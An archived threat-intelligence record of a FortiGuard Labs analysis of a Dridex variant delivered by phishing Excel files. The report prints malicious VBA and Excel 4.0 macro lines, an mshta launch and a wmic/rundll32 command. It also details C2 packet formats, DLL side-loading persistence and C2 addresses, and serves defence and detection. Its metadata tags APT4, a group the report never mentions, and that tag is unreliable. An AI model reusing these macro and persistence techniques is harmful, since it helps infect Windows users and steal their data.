{
	"id": "c79a14b4-27d2-41a4-ba11-2c03896893b0",
	"created_at": "2026-04-06T00:16:54.814865Z",
	"updated_at": "2026-04-10T13:11:59.531682Z",
	"deleted_at": null,
	"sha1_hash": "4814e593051578c4a1fc5ab229fb9b885eb85e15",
	"title": "New Dridex Variant Being Spread By Crafted Excel Document | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2277893,
	"plain_text": "New Dridex Variant Being Spread By Crafted Excel Document |\r\nFortiGuard Labs\r\nBy Xiaopeng Zhang\r\nPublished: 2021-09-10 · Archived: 2026-04-05 18:02:57 UTC\r\nFortiGuard Labs Threat Research Report\r\nAffected platforms: Microsoft Windows\r\nImpacted parties: Windows Users\r\nImpact: Collects sensitive information from victims’ computers and delivers and executes\r\nmalicious modules on victims’ devices.\r\nSeverity level: Critical\r\nDridex is a Trojan malware, also known as Bugat or Cridex, which is capable of stealing sensitive information\r\nfrom infected machines and delivering and executing malicious modules (dll).\r\nFortiGuard Labs recently captured new phishing email campaigns in the wild that included a specially crafted\r\nExcel document attachment. I did deep research on one of them and discovered that once the malicious Excel\r\ndocument is opened on a victim’s machine, it downloads a new variant of Dridex.\r\nIn this analysis, I will elaborate on how the Excel document downloads Dridex, how this version of Dridex runs on a\r\nvictim’s device, what sensitive information it collects, and how it delivers malicious modules (dll).\r\nThe Phishing Email of the Dridex Variant\r\nFigure 1.1 shows one of the recent phishing emails with a malicious Excel attachment infected with Dridex.\r\nhttps://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document\r\nPage 1 of 16\n\nFigure 1.1 – Text of a recently captured phishing email\r\nAs you can see, this email disguises itself as sending Import Tariffs data to a customer, and then asks him/her to\r\nview the details by opening the attached Excel file (in this case, “HF7.TRANS 2021.08.09.xlsb”).\r\nAnalysis of the Macro Inside the Excel Document\r\nWhen the recipient opens the attached Excel document, it contains a message at the top of the document in bold\r\nred letters asking them to “Please enable 
macros.” However, Excel displays a yellow “Security Warning” bar\r\ntelling the end user that macros are currently disabled, with the implication that clicking the button “Enable\r\nContent” may be risky, as shown in Figure 2.1.\r\nFigure 2.1 – Excel displays a warning bar when opening the infected Excel document\r\nLooking into the internal details of the Excel file, I found that it not only used an auto-run Macro (VBA) but\r\nalso an Excel 4.0 Macro. There is an auto-run function called Workbook_Open() in the Macro (VBA), which is\r\nautomatically called when the Excel file is opened.\r\nThe code is included below:\r\nSub Workbook_Open()\r\n    ' Write the drop path into cell A1 of the hidden \"Macro1\" sheet for the Excel 4.0 macro to use\r\n    ActiveWorkbook.Sheets(\"Macro1\").Range(\"A1\").Value = Environ(\"allusersprofile\") & _\r\n        \"\\KgmsgJbgP.sct\"\r\nEnd Sub\r\nIt only sets the value Environ(\"allusersprofile\") & \"\\KgmsgJbgP.sct\" (“C:\\ProgramData\\KgmsgJbgP.sct” in my\r\ntesting environment) into the “$A$1” cell of a sheet called “Macro1”.\r\n“Macro1” is a hidden sheet that contains and executes the Excel 4.0 Macro, which is defined in the file\r\n“xl\\workbook.xml” as shown in Figure 2.2.\r\nFigure 2.2 – Excel 4.0 Macro sheet is defined in “Workbook.xml”\r\nExcel 4.0 macros use formulas in various cells to execute code. As long as you give it a starting cell, it executes\r\ncode from top to bottom, then from left to right.\r\nAfter the auto-run Macro (VBA) is executed, the Excel 4.0 Macro is executed automatically starting from the cell\r\n“Macro1!$A$4”.\r\nThe Excel 4.0 Macro extracts data from a bunch of cells within the “Macro1” sheet into a local file, whose file\r\npath is saved in $A$1, which is “C:\\ProgramData\\KgmsgJbgP.sct”. 
The extracted data is an HTML application\r\n(.hta file) with a piece of VBScript code. The last step of the Excel 4.0 Macro is to execute this “KgmsgJbgP.sct”\r\nfile using the “mshta” command, which is =EXEC(CONCATENATE(\"mshta \", CHAR(34), A1, CHAR(34))).\r\nThe final command to be executed is “mshta.exe C:\\ProgramData\\KgmsgJbgP.sct”. “mshta.exe” is a Windows\r\ndefault program that is used to execute an HTML application (.hta file) with HTML, Dynamic HTML, and one or\r\nmore scripting languages supported by Internet Explorer, such as VBScript or JScript.\r\nHTML Application Used to Download the Dridex Payload\r\nFigure 3.1 – Malicious VBScript code in the extracted hta file\r\nThe VBScript code, as shown in Figure 3.1, includes an array of ten URLs (refer to the “IOCs” section below for\r\ndetails) that link to the Dridex payload. It downloads Dridex from these ten URLs in a for-loop into a local file,\r\n“%ALLUSERSPROFILE%\\icXBOuZukiASGnpfVowZ.dll”, that is hardcoded in this VBScript code. When\r\nDridex is downloaded successfully, it then executes “wmic.exe” (the WMI command-line) to create a new process\r\nof “rundll32.exe”.\r\nThe simplified code looks like this (quotes inside a VBScript string literal are doubled):\r\nCreateObject(\"Wscript.Shell\").Exec(\"wmic process call create \"\"Rundll32.exe \" & _\r\n    \"%ALLUSERSPROFILE%\\icXBOuZukiASGnpfVowZ.dll ReportDeviceAdd\"\"\")\r\nFinally, Rundll32.exe loads the Dridex payload file “icXBOuZukiASGnpfVowZ.dll” and then calls its export\r\nfunction, named “ReportDeviceAdd”, to execute its malicious functions.\r\nDiving Into the Downloaded Dridex Payload File\r\nFigure 4.1 – The Dridex variant’s export function list in IDA Pro\r\nFigure 4.1 shows the export function list of the payload file of Dridex in IDA Pro. 
It contains two functions:\r\nDllEntryPoint() is the entry function for this dll, and FWroeeWqoinnmw() is the real entry function. An odd thing\r\nhere is that there is no function for “ReportDeviceAdd”, which should be the starting point of this Dridex variant.\r\nTo figure this out, we analyzed the internal strategy Rundll32.exe uses to load a module and then call its export\r\nfunction. Figure 4.2 shows the export function list of the Dridex payload file after it is unpacked. It provides six\r\nexport functions. The fourth function is “ReportDeviceAdd”.\r\nFigure 4.2 – The export function list of the unpacked payload file\r\nHere are the steps Rundll32.exe uses to load a dll and invoke its export function:\r\n1. Rundll32.exe calls the API LoadLibrary() to load the dll into memory and map it according to\r\nits PE structure.\r\n2. The loader first invokes the dll’s entry point function—DllEntryPoint()—to initialize the module.\r\n3. Rundll32.exe then calls the API GetProcAddress() with the function name “ReportDeviceAdd” to obtain the function\r\naddress from the module initialized in step 2.\r\n4. Rundll32.exe then calls the function address obtained in step 3.\r\nThis payload file also contains a packer-like routine to hinder analysis. 
It\r\ndoes the unpacking in step 2, when the payload file’s DllEntryPoint() is called.\r\nFrom this point, Rundll32.exe is able to obtain ReportDeviceAdd by calling the API GetProcAddress().\r\nAnti-analysis Techniques Used in Dridex\r\nMost modern malware includes anti-analysis techniques in its code to prevent it from being analyzed.\r\nThis Dridex variant uses anti-analysis techniques similar to another Dridex variant I analyzed last year, which are:\r\n- All APIs are hidden and are resolved by the hash of their names.\r\n- All constant strings are encrypted in memory and decrypted just before use.\r\n- Some APIs are called in a crafted way to raise an exception (0x80000003) on purpose. It then catches the\r\nexception in the exception handler function, which actually calls the API.\r\nFormat of the Packet Sent to the C2 Server\r\nDridex collects sensitive data from the victim’s infected device, which is then placed into a formatted packet,\r\nencrypted, and sent to the C2 server.\r\nFigure 5.1 is a screenshot of the first packet to a C2 server just before it is encrypted. All the packets to the\r\nC2 server have the same packet format. 
As an example, I’ll elaborate on the format of the packet below, which has\r\nbeen separated into many fields by red pipes in the screenshot.\r\nThe selected part is common data for all packets, which is referred to as the “packet header” in this analysis.\r\nFigure 5.1 – The first packet to the C2 server before encryption\r\nTable 5.1 explains the content of each field in the packet format.\r\nOffset  Length    Data\r\n0x00    0x01      The length of the victim’s ID string.\r\n0x01    0x29      The victim’s ID string, which is variable.\r\n0x2A    0x20      The hard drive’s volume information for the infected device.\r\n0x4A    0x02      Dridex version information—which is 0x56B9 in this variant.\r\n0x4C    0x04      A dword mixed with infected Windows version information.\r\n0x50    0x04      Packet type identification. 0x18F8C844 is for the first packet.\r\n0x54    0x01      Windows platform. 0x20 for 32-bit, 0x40 for 64-bit.\r\n0x55    variable  Collected data from the victim’s system.\r\nTable 5.1 – Description of the fields of the packet\r\n- The victim’s ID string contains the computer name, an underscore, and an MD5 hash of a string that includes\r\nthe computer name, user name, and the Windows system’s install date.\r\n- The hard drive’s volume information is an MD5 value made from the volume information of “C:\\” and\r\nthe Windows installation date.\r\n- 0x56B9 is hardcoded data in the malware, possibly the malware version.\r\n- 0x11C1B11D is a mixed data set of Windows version information, which is obtained from the result of the APIs\r\nGetVersionEx() and GetSystemInformation().\r\n- Dridex has five packet type IDs in this variant used to notify the C2 server. 
They are 0x18F8C844,\r\n0x69BE7CEE, 0x11041F01, 0xD3EF7577, and 0x32DC1DF8.\r\n- The value 0x20 indicates that the victim’s Windows system is a 32-bit platform.\r\nThe field values of every Dridex packet header (except for the packet type ID) are the same for all the packets on the\r\nsame machine.\r\nThe collected data (starting from offset 0x55) is appended to the packet header and has two fields—the\r\ncollected data size (four bytes in network byte order) followed by the collected data itself.\r\nSending Collected Information to the C2 Server\r\nAs with its previous version, the IP addresses and ports of the C2 servers are hardcoded in the data. Below is the IP list in\r\nbinary of the three C2 servers (each dword, as laid out in memory, holds the four address octets in order, and the\r\nfollowing word holds the port in host byte order).\r\n.data:72C6D02C         dd 2C94B67h     ; IP: 103.75.201.2\r\n.data:72C6D030         dw 1BBh         ; port: 443\r\n.data:72C6D032         dd 6C01DF9Eh    ; IP: 158.223.1.108\r\n.data:72C6D036         dw 1851h        ; port: 6225\r\n.data:72C6D038         dd 0F21C16A5h   ; IP: 165.22.28.242\r\n.data:72C6D03C         dw 1238h        ; port: 4664\r\nThe malware chooses one IP address and port pair in a for-loop. Once a connection to the C2 server is\r\nsuccessfully established, it is used for the life of the process.\r\n“0x18F8C844” is the packet ID for the very first packet. The collected data consists of all installed\r\nsoftware (including software name and version) and all environment variables defined in the infected system.\r\nIt obtains the installed software information one-by-one by enumerating the sub-keys under the key\r\n“HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall” in the system registry.\r\nIt also steals the values of environment variables defined in the victim’s system. 
On my testing machine, they\r\nare ALLUSERSPROFILE, APPDATA, CommonProgramFiles, COMPUTERNAME, ComSpec,\r\nFP_NO_HOST_CHECK, HOMEDRIVE, HOMEPATH, LOCALAPPDATA, LOGONSERVER,\r\nNUMBER_OF_PROCESSORS, OS, Path, PATHEXT, PROCESSOR_ARCHITECTURE,\r\nPROCESSOR_IDENTIFIER, PROCESSOR_LEVEL, PROCESSOR_REVISION, ProgramData, ProgramFiles,\r\nPSModulePath, PUBLIC, QT_AUTO_SCREEN_SCALE_FACTOR, SystemDrive, SystemRoot, TEMP, TMP,\r\nUSERDOMAIN, USERNAME, USERPROFILE, VS140COMNTOOLS, and windir.\r\nIt calls the API GetEnvironmentStringsW() to obtain all the values of the above environment variables. Figure 6.1\r\nshows a partial set of the name-value pairs obtained in memory.\r\nFigure 6.1 – Display of obtained environment variables on the victim’s device\r\nOnce the first packet is finished, Dridex encrypts the packet and sends it to the C2 server using the HTTP POST\r\nmethod. It invokes a group of APIs to send and receive the data, such as InternetConnectW(),\r\nHttpOpenRequestW(), HttpSendRequestW(), HttpQueryInfoW(), and InternetReadFile().\r\nUnfortunately, its C2 servers were down during my analysis, so it was unable to send/receive data to/from the C2\r\nservers. But according to its code workflow, I could create a fake Dridex C2 server to simulate the server’s\r\nbehaviors, receiving and replying to Dridex, to continue my research. The following analysis is based on this\r\nsimulated data.\r\nDeploying a Malicious Module From the C2 Server and Performing Persistence\r\nAfter receiving the response to the first packet from the C2 server, Dridex sends the second packet (packet ID\r\n0x11041F01) with no collected data. The C2 server should reply with a malicious module (dll file) in the response packet.\r\nDridex verifies the response packet by comparing the packet’s hash code, which is the first four bytes of the\r\npacket. 
Next, Dridex sends another packet (packet ID 0xD3EF7577) to inform the C2 server that it has\r\nsuccessfully received the module.\r\nFigure 7.1 - A module extracted from the second response packet.\r\nThe second response packet contains an encrypted module (dll). After Dridex verifies the received packet, it\r\ndecrypts the module—which looks like the memory data displayed at the bottom of Figure 7.1.\r\nDridex then proceeds to deploy this malicious module onto the victim’s machine and then creates a scheduled task\r\nto run the module. Let’s see how it does this.\r\nTo keep the module running secretly on the victim’s machine, Dridex uses a Windows default program to load and\r\nrun it (a DLL side-loading technique). It randomly chooses a Windows program (exe) from “%windir%\\system32” together with a dll file that\r\nthe chosen program has to load. Next, Dridex overwrites the chosen dll file with the received module. Hence,\r\nonce the chosen program starts, the malicious module within the chosen dll is executed.\r\nIn this way, the victim sees only a Windows program running, not a malware module.\r\nFigure 7.2 is a screenshot of the just-chosen pair of Windows program and dll file from\r\n“%windir%\\system32\\”.\r\nFigure 7.2 – Chosen Windows program and dll\r\nDridex copies the chosen Windows program (this time, it’s “sdclt.exe”) into a newly-created folder with a random\r\nname (like “Okuo”) under the “%appdata%” folder. Meanwhile, it reads the chosen dll (“slc.dll”) into memory\r\nand then overwrites its data with the malicious module obtained from the response to the second packet. Finally,\r\nDridex calls the API WriteFile() to save it to the same folder as the copied Windows program. 
From now on,\r\nwhenever the Windows program—“sdclt.exe”—starts, it loads and executes the “slc.dll” that contains the\r\nmalicious module.\r\nDridex then creates a scheduled task in the infected Windows system to achieve persistence on the victim’s\r\nmachine. The action of the task is just to start the copied Windows program (i.e. “sdclt.exe”), and it is triggered\r\nto repeat this action every 30 minutes.\r\nFigure 7.3 shows a screenshot of “Task Scheduler” with the added task named “Tixvzwbtojdsmg”, as well as the\r\ncopied “sdclt.exe” and “slc.dll” files in the folder “Okuo”.\r\nFigure 7.3 – Added scheduled task and copied Windows program and dll files.\r\nBesides adding the scheduled task, it also calls the API CreateProcessW() to run “sdclt.exe” once just after it\r\nhas been deployed.\r\nBefore Dridex exits, it sends a packet with the ID 0x69BE7CEE to inform the C2 server that the malicious\r\npayload has been successfully installed on the victim’s machine. 
Figure 7.4 is a code snippet that generates and\r\nsends this packet.\r\nFigure 7.4 – Code snippet of handling packet 0x69BE7CEE\r\nConclusion - Dridex Variant\r\nYou have now learned how this Dridex campaign is run, including the phishing email, how the malicious code\r\ninside the attached Excel document is executed to extract an HTML application file, and finally, how\r\nRundll32.exe is called to execute the downloaded Dridex payload file.\r\nI elaborated on how this variant of Dridex communicates with its C2 server, the fields contained in the packet,\r\nhow it asks the C2 server for a malicious module, and how the module is deployed onto the infected system.\r\nI also made a flow chart of how Dridex communicates with its C2 servers, shown below in Figure 8.1. It clearly shows\r\nwhich packets and data were sent to the C2 server and when it received the malicious module. 
It will help you better\r\nunderstand the entire process.\r\nFigure 8.1 - Communication flow chart between Dridex and its C2 server.\r\nFortinet Protections\r\nFortinet customers are already protected from this malware by FortiGuard’s Web Filtering, AntiVirus and\r\nFortiEDR services, as follows:\r\nThe downloading URLs have been rated as \"Malicious Websites\" by the FortiGuard Web Filtering service.\r\nThe attached Excel document and downloaded Dridex payload file are detected as \"MSExcel/Dridex.AC!tr\" and\r\n\"W32/Dridex.HMAH!tr\" and are blocked by the FortiGuard AntiVirus service.\r\nFortiMail users are protected by FortiGuard AntiVirus, which detects the original Excel document as a malicious\r\nattachment in the phishing email.\r\nFortiEDR detects the downloaded executable file as malicious based on its behavior.\r\nIOCs\r\nURLs:\r\nC2 Server IP and Port:\r\n\"103.75.201.2:443\"\r\n\"158.223.1.108:6225\"\r\n\"165.22.28.242:4664\"\r\nSample SHA-256:\r\n[HF7.TRANS 2021.08.09.xlsb]\r\n59C8D87A450F0647BEA930EBA1AA692B75D82DEF1358F1601C4FE9A561B4707E\r\n[DTCZ SHIP_2021.08.09.xlsb]\r\nC8065BD2A1443FF988E9BA95022554F6EE302E9BCB4082C3D9B2B8D74C5A4BE5\r\n[icxbouzukiasgnpfvowz.dll]\r\n6556E4029CF50C9538F4E02D0BCCA5356F28E6870E62838E164020A31B3DF096\r\nLearn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard\r\nSecurity Subscriptions and Services portfolio.\r\nLearn more about Fortinet’s free cybersecurity training, an initiative of Fortinet’s Training Advancement Agenda\r\n(TAA), or about the Fortinet Network Security Expert program, Security Academy program, and Veterans\r\nprogram. Learn more about FortiGuard Labs global threat intelligence and research and the FortiGuard Security\r\nSubscriptions and Services portfolio.\r\nSource: https://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/new-dridex-variant-being-spread-by-crafted-excel-document"
	],
	"report_names": [
		"new-dridex-variant-being-spread-by-crafted-excel-document"
	],
	"threat_actors": [
		{
			"id": "68cc6e37-f16d-4995-a75b-5e8e2a6cbb3d",
			"created_at": "2024-05-01T02:03:07.943593Z",
			"updated_at": "2026-04-10T02:00:03.795229Z",
			"deleted_at": null,
			"main_name": "BRONZE EDISON",
			"aliases": [
				"APT4 ",
				"DarkSeoul",
				"Maverick Panda ",
				"Salmon Typhoon ",
				"Sodium ",
				"Sykipot ",
				"TG-0623 ",
				"getkys"
			],
			"source_name": "Secureworks:BRONZE EDISON",
			"tools": [
				"Gh0st RAT",
				"Wkysol",
				"ZxPortMap"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d4ac28d1-66eb-4f2d-9f9b-a72394349fd0",
			"created_at": "2023-01-06T13:46:38.667954Z",
			"updated_at": "2026-04-10T02:00:03.061447Z",
			"deleted_at": null,
			"main_name": "APT4",
			"aliases": [
				"PLA Navy",
				"MAVERICK PANDA",
				"BRONZE EDISON",
				"SODIUM",
				"Salmon Typhoon"
			],
			"source_name": "MISPGALAXY:APT4",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6fbff48b-7a3e-4e54-ac22-b10f11e32337",
			"created_at": "2022-10-25T16:07:23.318008Z",
			"updated_at": "2026-04-10T02:00:04.539063Z",
			"deleted_at": null,
			"main_name": "APT 4",
			"aliases": [
				"APT 4",
				"Bronze Edison",
				"Maverick Panda",
				"Salmon Typhoo",
				"Sodium",
				"Sykipot",
				"TG-0623",
				"Wisp Team"
			],
			"source_name": "ETDA:APT 4",
			"tools": [
				"Getkys",
				"Sykipot",
				"Wkysol",
				"XMRig"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434614,
	"ts_updated_at": 1775826719,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4814e593051578c4a1fc5ab229fb9b885eb85e15.pdf",
		"text": "https://archive.orkl.eu/4814e593051578c4a1fc5ab229fb9b885eb85e15.txt",
		"img": "https://archive.orkl.eu/4814e593051578c4a1fc5ab229fb9b885eb85e15.jpg"
	}
}